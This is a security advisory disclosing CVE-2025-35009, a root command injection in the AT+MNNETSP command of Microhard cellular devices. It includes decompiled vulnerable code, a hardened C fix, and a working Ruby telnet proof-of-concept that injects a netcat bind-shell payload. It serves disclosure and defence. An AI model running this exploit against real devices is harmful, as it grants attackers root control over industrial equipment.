CVE-2025-35009: Microhard Bullet-LTE and IPn4Gii AT+MNNETSP Argument Injection
AHA! has discovered an issue with multiple Microhard products, and is issuing this disclosure in accordance with AHA!’s standard disclosure policy on June 8, 2025. CVE-2025-35009 has been assigned to this issue.
Any questions about this disclosure should be directed to [email protected].
Executive Summary
Products that incorporate the Microhard BulletLTE-NA2 and IPn4Gii-NA2 are vulnerable to a post-authentication command injection issue that can lead to privilege escalation. This is an instance of CWE-88, “Improper Neutralization of Argument Delimiters in a Command (‘Argument Injection’),” and is estimated at CVSS 7.1.
Technical Details
A command injection vulnerability exists within the AT+MNNETSP command in the restricted CLI interface of multiple Microhard products. Authentication is required to exploit this vulnerability: an attacker must have a user account to access the CLI via telnet. However, the service runs as root, so injecting commands allows an attacker to escape the restricted shell and elevate privileges for full access.
The firmware for affected devices contains the binary /bin/clitest, which handles the restricted CLI interface. It is reachable via a telnet or ssh connection. It allows the user to run certain config commands as well as AT+ commands to interact with the Quectel modem. One of these AT+ commands is AT+MNNETSP, which is used to check network performance against an external server. User input is supplied to the cmd_netperf_speed() function in param_3 and is used as an argument for the /usr/bin/speedtest.sh script, which is called via system():
```c
/* Decompiled (Ghidra-style) excerpt of cmd_netperf_speed() from /bin/clitest.
   acStack_228 holds the user-supplied AT+MNNETSP argument taken from param_3;
   it is spliced into a shell command string and executed via system(). */
undefined4 cmd_netperf_speed(undefined4 param_1,undefined4 param_2,char **param_3,int param_4)
{
  ...
  cli_print(param_1,"Netperf is running, please wait......\n");
  memset(acStack_268,0,0x40);
  strcpy(acStack_268,"cat /dev/null > /var/run/speedtestlog");
  system(acStack_268);
  memset(acStack_268,0,0x40);
  /* user input is interpolated unescaped: $(...) and backticks are expanded by /bin/sh */
  sprintf(acStack_268,"/bin/sh /usr/bin/speedtest.sh %s > /var/run/speedtestlog",acStack_228);
  system(acStack_268);
  memset(acStack_268,0,0x40);
  ...
}
```
If an attacker wraps input to the AT+MNNETSP command in $() (dollar-parentheses) or backticks (which are tricky to render in Markdown!), they can put whatever command they want and it will be run as the root user. Note that spaces are not allowed, so $IFS must be used instead for space-delimited arguments in the command payload.
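To make the root cause and the fix concrete, here is an added example (not code from the advisory, from Microhard, or from /bin/clitest) that places the vulnerable pattern beside a hardened version. The hardened launcher does two things: it validates the argument against an allowlist, and it runs the script with fork()/execv() and an argv vector, so the user string arrives as $1 of speedtest.sh and is never parsed as shell syntax. The allowlist (digits, letters, `.`, `,`, `-`, at most 64 bytes) is an assumption about what a legitimate AT+MNNETSP argument looks like, modelled on the `4,<server>` form used in the PoC; the real grammar is not documented on the page. The example also assumes speedtest.sh does not itself eval its arguments, which the argv approach cannot protect against.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Vulnerable pattern, as in the decompiled cmd_netperf_speed(): the user string
   is spliced into a shell command line, so $(...), backticks and $IFS are
   interpreted by /bin/sh. Kept only to contrast with the hardened version;
   the string it builds is never executed here. */
int build_vulnerable_cmd(char *out, size_t outlen, const char *user_arg)
{
    return snprintf(out, outlen,
                    "/bin/sh /usr/bin/speedtest.sh %s > /var/run/speedtestlog",
                    user_arg);
}

/* Allowlist check. ASSUMPTION for this example: a valid argument is a short
   "<mode>,<host-or-IPv4>" string, so only [A-Za-z0-9.,-] is accepted.
   Every shell metacharacter ($ ` ( ) ; | & space) is rejected. */
int netperf_arg_is_safe(const char *arg)
{
    size_t n = strlen(arg);
    if (n == 0 || n > 64)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (!isalnum(c) && c != '.' && c != ',' && c != '-')
            return 0;
    }
    return 1;
}

/* Hardened launcher: validate, then fork/execv with an argv vector. No shell
   command line is ever built from user input; the argument becomes $1 of the
   script. Returns the script's exit status, or -1 on rejection or error. */
int run_speedtest_hardened(const char *script, const char *user_arg, const char *logpath)
{
    if (!netperf_arg_is_safe(user_arg))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* redirect stdout to the log file without a shell ">" redirection */
        if (freopen(logpath, "w", stdout) == NULL)
            _exit(127);
        char *const argv[] = { "/bin/sh", (char *)script, (char *)user_arg, NULL };
        execv("/bin/sh", argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[256];
    const char *injected = "4,`id`";   /* constructed sample of a hostile argument */

    build_vulnerable_cmd(cmd, sizeof cmd, injected);
    printf("vulnerable command line handed to system(): %s\n", cmd);

    /* /dev/null stands in for speedtest.sh: an empty script that exits 0 */
    printf("hardened path, hostile argument (expect -1): %d\n",
           run_speedtest_hardened("/dev/null", injected, "/dev/null"));
    printf("hardened path, plain argument (expect 0): %d\n",
           run_speedtest_hardened("/dev/null", "4,speedtest.example.net", "/dev/null"));
    return 0;
}
```

The allowlist alone would already have blocked the PoC payload, but the argv vector is the more important change: even if the allowlist were later loosened, the argument can no longer turn into a second command because nothing re-parses it.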
The Ruby script below effectively demonstrates an attack using CVE-2025-35009 as a proof-of-concept:
```ruby
#!/usr/bin/env ruby
# Proof-of-concept for CVE-2025-35009: log in to the restricted CLI over telnet
# and send an AT+MNNETSP command whose argument carries a backtick-wrapped payload.
require 'net/telnet'
require 'io/console'

if !ARGV[0]
  puts "usage: #{$0} <ip> [<username> <password>]"
  exit(1)
end

target = ARGV[0]
if ARGV[1] && ARGV[2]
  user = ARGV[1]
  pass = ARGV[2]
else
  printf("user: ")
  user = STDIN.gets.chomp
  printf("pass: ")
  pass = STDIN.noecho(&:gets).chomp
  puts ""
end

telnet = Net::Telnet::new("Host" => target, "Timeout" => 2, "Prompt" => /^\w+>/)
telnet.login(user, pass) { |c| print c }
begin
  # Backticks are expanded by /bin/sh when speedtest.sh is run via system();
  # $IFS stands in for spaces, which the CLI does not accept.
  telnet.cmd("at+mnnetsp=4,`nc$IFS-lvp$IFS\\4444$IFS-e$IFS/bin/sh$IFS-i`") { |c| print c }
rescue
  # The injected listener never returns, so the 2-second telnet timeout raises;
  # that is the cue to connect to it.
  puts "shell spawned on #{ARGV[0]}:4444"
  pid = spawn("nc -v #{ARGV[0]} 4444")
  Process.wait pid
end
telnet.close
```
Attacker Value
If an attacker has a valid credential for the affected Microhard device, and the means to log in (for example, over telnet), that attacker can leverage this vulnerability to escape the restricted shell and elevate privileges to root. Industrial control systems (ICS) are often deployed with easy-to-guess or default credentials, which could be used in conjunction with CVE-2025-35009 to achieve complete, root-level remote control over affected devices.
Credit
This vulnerability was discovered and documented by Ricky “HeadlessZeke” Lawshae of Keysight.
Timeline
- 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
- 2025-04-02 (Wed): Contact initiated to several guessed email aliases, such as [email protected], [email protected], etc.
- 2025-04-02 (Wed): Bounces collected from media@, press@, security@, and secure@. No bounce notification was generated from info@ and support@, though a customer account was required to further communicate with support@, which AHA! does not have.
- 2025 (April and May): No further communication from the vendor was received.
- 2025-06-08 (Sun): Verified current IPn4Gii/BulletLTE firmware remains at v1.2.0-r1132
- 2025-06-08 (Sun): Public disclosure of CVE-2025-35009